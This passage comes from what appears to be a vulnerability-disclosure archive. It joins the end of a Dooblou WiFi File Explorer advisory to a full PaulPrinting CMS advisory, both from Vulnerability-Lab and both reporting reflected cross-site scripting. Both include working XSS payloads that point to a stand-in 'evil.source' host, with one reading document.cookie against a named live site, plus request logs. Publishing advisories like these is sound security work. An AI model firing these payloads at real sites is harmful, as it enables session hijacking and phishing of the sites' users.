"name");javascript:document.multiSelect.submit();'style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td><td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img"title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style:none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=38&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img"title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table>---PoC Session Logs ---http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xmlHost: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3EGET: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/xml-http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0Upgrade-Insecure-Requests: 1GET: HTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html-http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xmlHost: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source"  onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3EGET: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/xmlSecurity Risk:==============The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Dooblou WiFi File Explorer 1.13.3 Cross Site Scripting

PaulPrinting CMS suffers from a cross site scripting vulnerability.

Document Title:  
===============  
PaulPrinting CMS - (Search Delivery) Cross Site Vulnerability

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2286

Release Date:  
=============  
2023-07-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2286

Common Vulnerability Scoring System:  
====================================  
5.2

Vulnerability Class:  
====================  
Cross Site Scripting - Non Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.

(Copy of the Homepage:https://codecanyon.net/user/codepaul  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the PaulPrinting (v2018) cms web-application.

Vulnerability Disclosure Timeline:  
==================================  
2022-08-25: Researcher Notification & Coordination (Security Researcher)  
2022-08-26: Vendor Notification (Security Department)  
2022-**-**: Vendor Response/Feedback (Security Department)  
2022-**-**: Vendor Fix/Patch (Service Developer Team)  
2022-**-**: Security Acknowledgements (Security Department)  
2023-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
Medium User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application.  
Remote attackers are able to manipulate client-side requests by injection of malicious script code to compromise user session data.

The client-side cross site scripting web vulnerability is located in the search input field with the insecure validated q parameter  
affecting the delivery module. Remote attackers are able to inject own malicious script code to the search input to provoke a client-side  
script code execution without secure encode. The request method to execute is GET and the attack vector is non-persistent.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects  
to malicious source and non-persistent manipulation of affected application modules.

Request Method(s):  
[+] GET

Vulnerable Module(s):  
[+] /account/delivery

Vulnerable Input(s):  
[+] Search

Vulnerable Parameter(s):  
[+] q

Affected Module(s):  
[+] /account/delivery  
[+] Delivery Contacts

Proof of Concept (PoC):  
=======================  
The non-persistent xss web vulnerability can be exploited by remote attackers with low privileged user account and medium user interaction.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Example  
https://codeawesome.in/printing/account/delivery?q=

PoC: Exploitation  
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>

--- PoC Session Logs (GET) ---  
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>  
Host: codeawesome.in  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Connection: keep-alive  
Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf;  
-  
GET: HTTP/3.0 200 OK  
content-type: text/html; charset=UTF-8  
x-powered-by: PHP/7.1.33

Vulnerable Source:  (Search - delivery?q=)  
<div class="col-lg-8">  
<a href="https://codeawesome.in/printing/account/delivery"  class="btn btn-primary mt-4 mb-2 float-right">  
<i class="fa fa-fw fa-plus"></i>  
</a>  
<form class="form-inline mt-4 mb-2" method="get">  
<div class="input-group mb-3 mr-2">  
<input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">">  
<div class="input-group-append">  
<button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button>  
</div></div>

Security Risk:  
==============  
The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Tag

#php